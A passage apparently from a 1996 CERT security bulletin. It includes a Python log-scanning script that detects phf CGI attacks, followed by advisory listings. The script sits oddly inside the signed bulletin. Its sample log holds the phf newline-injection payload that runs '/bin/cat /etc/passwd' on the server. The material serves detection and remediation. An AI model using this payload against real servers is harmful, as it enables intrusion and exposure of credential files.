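LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

SAMPLE_LOG = """\
203.0.113.9 - - [26/Nov/1996:03:14:07 -0500] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1432
198.51.100.2 - - [26/Nov/1996:03:15:11 -0500] "GET /cgi-bin/phf?Qalias=x%0A/bin/cat%20/etc/passwd HTTP/1.0" 404 212
198.51.100.5 - - [26/Nov/1996:03:16:40 -0500] "GET /index.html HTTP/1.0" 200 3021
198.51.100.7 - - [26/Nov/1996:03:17:02 -0500] "GET /cgi-bin/phf?Qname=smith HTTP/1.0" 200 615
"""


def phf_attempts(log_text):
    """(client, decoded_query, status) for phf requests whose query carries a
    newline. Status 200 means the server ran the request; 404 means phf had
    already been removed and the attempt failed."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        path, _, query = target.partition("?")
        if not path.endswith("/phf"):
            continue
        decoded = unquote(query)
        if "\n" in decoded or "\r" in decoded:
            hits.append((client, decoded, int(status)))
    return hits


if __name__ == "__main__":
    attack = unquote("x%0a/bin/cat%20/etc/passwd")
    print(shell_commands(phf_command_line(attack)))        # two commands run
    print("hardened rejects it:", hardened_rejects(attack))
    for client, query, status in phf_attempts(SAMPLE_LOG):
        print(client, status, repr(query))
```

The remedy in CA-96.06 was to remove phf and the other sample CGI programs from cgi-bin; escaping is only a last line of defence, and a program that never hands request data to a shell has no list of bad characters to get wrong. In the sample log the 404 is the outcome described above, an attempt that failed because phf was no longer installed, while the 200 means the password file should be treated as exposed and the protections in the passwd_file_protection tech tip applied.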
2. Continuing Linux Exploits
We continue to see incidents in which Linux machines have been the victims
of root compromises. In many of these incidents, the compromised systems
were unpatched or misconfigured, and the intruders exploited well-known
vulnerabilities for which CERT advisories have been published.
If you are running Linux, we strongly urge you to keep current with all
security patches and workarounds. If your system has been root compromised,
we also recommend that you review
ftp://info.cert.org/pub/tech_tips/root_compromise
Further, you may want to monitor the Linux newsgroups and mailing lists for
security patches and workarounds. More information can be found at
http://bach.cis.temple.edu/linux/linux-security/
- ----------------------------------
What's New in the CERT FTP Archive
- ----------------------------------
We have made the following changes since the last CERT Summary (September 24,
1996).
* New Additions
ftp://info.cert.org/pub/cert_advisories/
CA-96.22.bash_vuls Addresses two problems with the GNU
Project's Bourne Again SHell (bash):
one in yy_string_get() and one in
yy_readline_get().
CA-96.23.workman_vul Describes a vulnerability in the
WorkMan compact disc-playing program
that affects UNIX System V Release 4.0
and derivatives and Linux systems.
CA-96.24.sendmail.daemon.mode Addresses a vulnerability that allows
intruders to gain root
privileges. Includes patch and upgrade
information.
ftp://info.cert.org/pub/cert_bulletins/
VB-96.17.linux Linux Security FAQ Update from
Alexander Yuriev. Includes information
about a mount/umount vulnerability.
VB-96.18.sun Addresses vulnerabilities in the libc
and libnsl libraries of Solaris 2.5
(SunOS 5.5) and Solaris 2.5.1
(SunOS 5.5.1) from Sun Microsystems,
Inc. Includes patch information.
ftp://info.cert.org/pub/latest_sw_versions/
bash Added information on bash 1.14.7.
sendmail Added information on sendmail 8.8.3.
* Updated Files
ftp://info.cert.org/pub/
Sysadmin_Tutorial.announcement Added date of next course offering.
ftp://info.cert.org/pub/cert_advisories/
CA-94:01.ongoing.network.monitoring.attacks
Clarified introductory
information. Added a pointer to the
CERT tech tip on root compromises.
CA-95:02.binmail.vulnerabilities Removed Appendices B & C, which
contained outdated information. In
section B, added information that
mail.local is now part of
sendmail. Added a pointer to sendmail.
CA-96.09.rpc.statd Updated information from Silicon
Graphics Inc.
CA-96.20.sendmail_vul Added a pointer to CA-96.24.
CA-96.21.tcp_syn_flooding Revised second paragraph of
introduction for clarity. Added new
information for Silicon Graphics
Inc. (SGI), Berkeley Software Design,
Inc. (BSDI), Sun Microsystems, Inc.
Revised appendix information on
reserved private network
numbers. Added pointer to information
in ftp://info.cert.org/pub/vendors.
CA-96.22.bash_vuls Added Appendix A containing
information from IBM Corporation,
LINUX, and Silicon Graphics,
Inc. (SGI). Removed patch for problem
in yy_readline_get, as the problem
described for yy_string_get is not
exploitable for yy_readline_get.
ftp://info.cert.org/pub/tools/mail.local/
README Added information that mail.local is
now a part of sendmail. Added a
pointer to sendmail.
ftp://info.cert.org/pub/tools/sendmail/
sendmail.8.8.3.patch
sendmail.8.8.3.tar.Z
sendmail.8.8.3.tar.gz
sendmail.8.8.3.tar.sig
ftp://info.cert.org/pub/vendors/hp/
HP.contact_info Replaced instructions for subscribing
by email with the new URLs people must
use.
- ---------------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBMpoitXVP+x0t4w7BAQEp1gP/XK7WsKsoplL4F9YdMi9CyHCd/H1Qh3Nm
oyJDD9O19EPsCjeuFgBX5bGWb26L1MeuuCyEhV/5Z9Vf2R9wrPcOq3l+UeVjV/0t
SDwp/Y2R4uP+hdCzkDKk5Ryuzoxq3xj4TD0GNv8XRShQbUR2u05zFbzbyiH+ONh8
C7E1HKBP03M=
=nrOY
-----END PGP SIGNATURE-----